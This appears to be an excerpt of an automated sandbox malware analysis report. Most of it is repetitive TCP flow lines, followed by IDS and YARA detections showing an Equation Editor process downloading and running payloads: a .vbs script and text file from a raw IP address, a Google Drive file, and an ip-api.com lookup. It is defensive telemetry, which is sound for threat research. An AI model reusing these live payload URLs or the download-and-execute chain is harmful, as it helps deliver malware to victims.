                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 107.172.31.13:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.212.174:443
                  Source: global trafficTCP traffic: 216.58.212.174:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.212.174:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.212.174:443
                  Source: global trafficTCP traffic: 216.58.212.174:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 216.58.212.174:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.212.174:443
                  Source: global trafficTCP traffic: 216.58.212.174:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.212.174:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.212.174:443
                  Source: global trafficTCP traffic: 216.58.212.174:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 216.58.212.174:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.212.174:443
                  Source: global trafficTCP traffic: 216.58.212.174:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 216.58.212.174:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 216.58.212.174:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.212.174:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.212.174:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 107.172.31.13:80 -> 192.168.2.22:49168
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.250.186.97:443 -> 192.168.2.22:49167
                  Source: Yara matchFile source: 8.2.powershell.exe.723ab28.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0356047F URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_0356047F
                  Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /madamwebaaaaa.txt HTTP/1.1Host: 107.172.31.13Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                  Source: Joe Sandbox ViewIP Address: 107.172.31.13 107.172.31.13
                  Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDNS query: name: ip-api.com
                  Source: global trafficHTTP traffic detected: GET /NIGHTTTTMPDW-constraints.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.31.13Connection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.22:49166 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49167 version: TLS 1.0
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0356047F URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_0356047F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\NIGHTTTTMPDW-constraints[1].vbsJump to behavior
                  Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
